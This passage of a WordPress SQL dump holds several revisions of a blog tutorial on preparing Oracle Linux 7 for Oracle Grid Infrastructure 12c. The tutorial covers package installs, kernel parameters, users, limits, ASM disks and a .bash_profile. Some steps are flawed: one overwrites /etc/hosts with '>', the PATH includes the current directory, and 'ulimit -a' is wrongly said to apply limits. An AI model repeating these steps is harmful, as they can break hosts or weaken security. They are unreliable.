wp:paragraph -->\n<p>and insert these records in it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1>.bash_profile</h1>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1>Get the aliases and functions</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>if [ -f ~/.bashrc ]; then<br>\n . ~/.bashrc<br>\nfi</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1>User specific environment and startup programs</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>export ORACLE_BASE=/u01/crs/oracle<br>\nexport ORACLE_HOME=/u01/crs/grid<br>\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data<br>\nexport TNS_ADMIN=$ORACLE_HOME/network/admin<br>\nexport ORACLE_DOC=$ORACLE_HOME/doc<br>\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256<br>\nexport TMPDIR=/tmp<br>\nexport TMP=/tmp<br>\nexport TZ=Asia/Tehran<br>\nexport ORACLE_SID=+ASM<br>\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg<br>\nexport ORACLE_UNQNAME=dbtest12<br>\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local<br>\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.<br>\nexport OWB_HOME=$ORACLE_HOME<br>\nunset USERNAME<br>\necho \".profile has been DONE successfully\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>cd /u01/crs/grid<br>\n./gridSetup.sh</p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:58:50','2020-02-02 09:58:50','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(43,2,'2020-02-02 10:00:34','2020-02-02 10:00:34','<!-- wp:paragraph -->\n<p>hi</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>hello\necho</code></pre>\n<!-- /wp:code -->\n\n<!-- wp:shortcode /-->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:00:34','2020-02-02 10:00:34','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(44,2,'2020-02-02 10:02:11','2020-02-02 10:02:11','<!-- wp:paragraph -->\n<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>First of all, you have to install required packages in the OS:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><code>yum install -y cloog-ppl libXxf86misc<br> yum install -y compat-libcap1 libXxf86vm<br> yum install -y compat-libstdc++-33 libaio-devel<br> yum install -y cpp libdmx<br> yum install -y gcc libstdc++-devel<br> yum install -y gcc-c++ mpfr<br> yum install -y glibc-devel make<br> yum install -y glibc-headers ppl<br> yum install -y kernel-headers xorg-x11-utils<br> yum install -y libXmu xorg-x11-xauth<br> yum install -y libXt libXv<br> yum install -y ksh libXxf86dga<br> yum install -y elfutils-libelf-devel<br> yum install -y sysstat<br> yum install -y smartmontools<br> yum install -y nfs-utils<br> yum install -y unzip<br> yum install -y net-tools<br> yum install -y kmod-oracleasm <br> yum install -y oracleasm-support</code></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>echo \"IP hostname hostname.domain\" > /etc/hosts</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you should calculate 3 parameters like this:<br>\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[ul]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>\nSHMALL = TOTAL RAM IN BYTES / PAGE_SIZE<br>\nSHMMAX = HALF OF TOTAL RAM IN BYTES<br>\nSHMMNI = PAGE_SIZE<br><br>\nto determine RAM size in bytes, you can use free command:\n</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>free -b</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vi /etc/sysctl.conf</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vm.swappiness = 0<br>\nvm.dirty_background_ratio = 3<br>\nvm.dirty_ratio = 80<br>\nvm.dirty_expire_centisecs = 500<br>\nvm.dirty_writeback_centisecs = 100<br>\nkernel.shmmax = <strong>SHMMAX </strong><br>\nkernel.shmall = <strong>SHMALL </strong><br>\nkernel.shmmni = <strong>SHMMNI </strong><br>\nkernel.sem = 250 32000 100 128<br>\nnet.ipv4.ip_local_port_range = 9000 65500<br>\nnet.core.rmem_default = 262144<br>\nnet.core.rmem_max = 4194304<br>\nnet.core.wmem_default = 262144<br>\nnet.core.wmem_max = 1048576<br>\nfs.aio-max-nr = 1048576<br>\nfs.file-max = 6815744</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and use this command to apply these changes:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>sysctl -p</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should add users and groups in OS:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>groupadd oinstall<br>\ngroupadd dba<br>\ngroupadd asmdba<br>\ngroupadd asmoper<br>\ngroupadd asmadmin<br>\ngroupadd oper<br>\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle<br>\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>usermod -g oinstall -G dba,oper,asmdba,asmoper oracle<br>\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>after that, you have to change password of these users:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>passwd oracle<br>\npasswd grid</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you should make directories for database and grid app and set permissions:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>mkdir /u01<br>\nchown -R oracle:oinstall /u01 <br>\nmkdir /u01/crs<br>\nmkdir /u01/crs/grid<br>\nchown -R grid:oinstall /u01/crs <br>\nmkdir /u01/app<br>\nchown -R oracle:oinstall /u01/app</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>unzip /source/V840012-01.zip -d /u01/crs/grid<br>\nunzip /source/V839960-01.zip -d /home/oracle</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then, you have to install an rpm file:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>rpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vi /etc/security/limits.d/99-grid-oracle-limits.conf</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>oracle soft nproc 2047<br>\noracle hard nproc 16384<br>\noracle soft nofile 1024<br>\noracle hard nofile 65536<br>\noracle soft stack 10240<br>\noracle hard stack 32768<br>\ngrid soft nproc 2047<br>\ngrid hard nproc 16384<br>\ngrid soft nofile 1024<br>\ngrid hard nofile 65536<br>\ngrid soft stack 10240<br>\ngrid hard stack 32768</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to apply these changes, you have to use this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ulimit -a </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>the next step is oracleasm configuration:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>/usr/sbin/oracleasm configure -i<br>\nConfiguring the Oracle ASM library driver.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This will configure the on-boot properties of the Oracle ASM library<br>\ndriver. The following questions will determine whether the driver is<br>\nloaded on boot and what permissions it will have. The current values<br>\nwill be shown in brackets (\'[]\'). Hitting without typing an<br>\nanswer will keep that current value. Ctrl-C will abort.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Default user to own the driver interface [grid]: <strong>grid</strong><br>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong><br>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong><br>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong><br>\nWriting Oracle ASM library driver configuration: done</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>systemctl enable oracleasm.service<br>\nsystemctl start oracleasm.service</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1<br>\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2<br>\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>then you run these commands:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>/usr/sbin/oracleasm scandisks<br>\n/usr/sbin/oracleasm listdisks</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and you have to config .bash_profile file of grid user:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>vi /home/grid/.bash_profile</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and insert these records in it:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1>.bash_profile</h1>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1>Get the aliases and functions</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>if [ -f ~/.bashrc ]; then<br>\n . ~/.bashrc<br>\nfi</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":1} -->\n<h1>User specific environment and startup programs</h1>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>export ORACLE_BASE=/u01/crs/oracle<br>\nexport ORACLE_HOME=/u01/crs/grid<br>\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data<br>\nexport TNS_ADMIN=$ORACLE_HOME/network/admin<br>\nexport ORACLE_DOC=$ORACLE_HOME/doc<br>\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256<br>\nexport TMPDIR=/tmp<br>\nexport TMP=/tmp<br>\nexport TZ=Asia/Tehran<br>\nexport ORACLE_SID=+ASM<br>\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg<br>\nexport ORACLE_UNQNAME=dbtest12<br>\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local<br>\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.<br>\nexport OWB_HOME=$ORACLE_HOME<br>\nunset USERNAME<br>\necho \".profile has been DONE successfully\"</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>cd /u01/crs/grid<br>\n./gridSetup.sh</p>\n<!-- /wp:paragraph -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:02:11','2020-02-02 10:02:11','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(46,2,'2020-02-02 10:13:25','2020-02-02 10:13:25','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code></pre>\n<!-- /wp:code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:<br>\n[ul]</p>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li><li>\n</li><li>SHMMNI = PAGE_SIZE\n</li><li>\n\n<p>to determine RAM size in bytes, you can use free command:</p></li>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nfree -b\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n</code></pre>\n<!-- /wp:code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsysctl -p\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\npasswd oracle\npasswd grid\n\n\nthen, you should make directories for database and grid app and set permissions:\n\n\nif you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:\n\nthen, you have to install an rpm file:\n\n\nand edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:\n\n\nto apply these changes, you have to use this command:\n\n\nthe next step is oracleasm configuration:\n\n\nnow, you have to start oracleasm service and make it available on startup:\n\n\nto make asm disks from raw devices (example: /dev/sdb*) you have to use this command:\n\n\nthen you run these commands:\n\n\nand you have to config .bash_profile file of grid user:\n\n\nand insert these records in it:\n\n\nfinally, you should go to grid software location and start oracle universal installer:</code></pre>\n<!-- /wp:code -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:13:25','2020-02-02 10:13:25','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(47,2,'2020-02-02 10:14:34','2020-02-02 10:14:34','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code></pre>\n<!-- /wp:code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:<br>\n[ul]</p>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li><li>\n</li><li>SHMMNI = PAGE_SIZE\n</li><li>\n\n<p>to determine RAM size in bytes, you can use free command:</p></li>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nfree -b\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n</code></pre>\n<!-- /wp:code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsysctl -p\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\npasswd oracle\npasswd grid\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n</code></pre>\n<!-- /wp:code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n</code></pre>\n<!-- /wp:code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n</code></pre>\n<!-- /wp:code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nulimit -a \n</code></pre>\n<!-- /wp:code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n</code></pre>\n<!-- /wp:code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n</code></pre>\n<!-- /wp:code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n</code></pre>\n<!-- /wp:code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /home/grid/.bash_profile\n</code></pre>\n<!-- /wp:code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n</code></pre>\n<!-- /wp:code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ncd /u01/crs/grid\n./gridSetup.sh\n</code></pre>\n<!-- /wp:code -->','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 10:14:34','2020-02-02 10:14:34','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(48,2,'2020-02-02 10:15:48','2020-02-02 10:15:48','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\necho \"IP hostname hostname.domain\" > /etc/hosts\n</code></pre>\n<!-- /wp:code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li><li>\n</li><li>SHMMNI = PAGE_SIZE\n</li><li>\n</li></ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nfree -b\n</code></pre>\n<!-- /wp:code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n</code></pre>\n<!-- /wp:code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\nsysctl -p\n</code></pre>\n<!-- /wp:code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:code -->\n<pre class=\"wp-block-code\"><code>\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper 